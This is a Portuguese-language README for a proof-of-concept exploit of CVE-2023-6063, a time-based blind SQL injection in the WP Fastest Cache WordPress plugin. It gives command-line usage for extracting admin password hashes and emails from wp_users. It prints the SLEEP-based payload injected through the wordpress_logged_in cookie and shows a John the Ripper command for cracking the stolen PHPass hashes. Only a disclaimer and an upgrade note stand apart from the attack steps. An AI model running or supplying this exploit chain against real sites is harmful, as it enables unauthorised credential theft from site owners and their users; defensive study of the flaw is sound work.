
Um Proof of Concept para CVE-2023-6063, uma vulnerabilidade de injeção SQL cega baseada em tempo no WP Fastest Cache ≤1.2.2.
Uma Prova de Conceito para CVE-2023-6063, uma vulnerabilidade de injeção SQL cega baseada em tempo no WP Fastest Cache ≤1.2.2. Extrai senhas com hash (user_pass) e e-mails (user_email) da tabela wp_users abusando do cookie wordpress_logged_in.
Este script extrai:
Instale as dependências (se não estiverem instaladas):
pip install -r requirements.txt
Uso básico:
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5
Opções completas:
-h, --help mostra esta mensagem de ajuda e sai
-u URL, --url URL URL completa para o WordPress para testar CVE-2023-6063
--username USERNAME Define um usuário para extrair sua senha com hash
-d DELAY, --delay DELAY
Tempo para aguardar resposta da web, padrão 5, mínimo 2
-H HASH, --hash HASH Hash para verificar na tabela wp_users, se o hash contiver caracteres especiais, use aspas simples -> '<hash>'
--domain DOMAIN Nome do domínio para validação de e-mail
-c COOKIE, --cookie COOKIE
Especifique um nome de cookie se for diferente no seu contexto
--status-code STATUS_CODE
Use um código de status positivo específico, padrão 200
--debug Mais detalhamento
--just-hash Apenas extrair senha com hash
--just-email Apenas extrair valor de e-mail para um usuário
Esta é uma demonstração para o usuário admin
https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890
Quando hashes de senhas são vazados, use john ou hashcat para descriptografá-los com o algoritmo PHPass se a senha for vulnerável.
Exemplo com John:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
O plugin WP Fastest Cache (≤1.2.2) para WordPress é vulnerável a uma injeção SQL cega não autenticada através do cookie wordpress_logged_in. Atacantes podem explorar esta falha para extrair dados sensíveis (por exemplo, hashes de senhas, endereços de e-mail) da tabela wp_users usando atrasos baseados em tempo (SLEEP()) em consultas SQL.
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -
🚨 Aviso: Use esta informação apenas para testes de segurança éticos com autorização adequada. A exploração não autorizada é ilegal.
Atualize o WP Fastest Cache para a versão >1.2.2.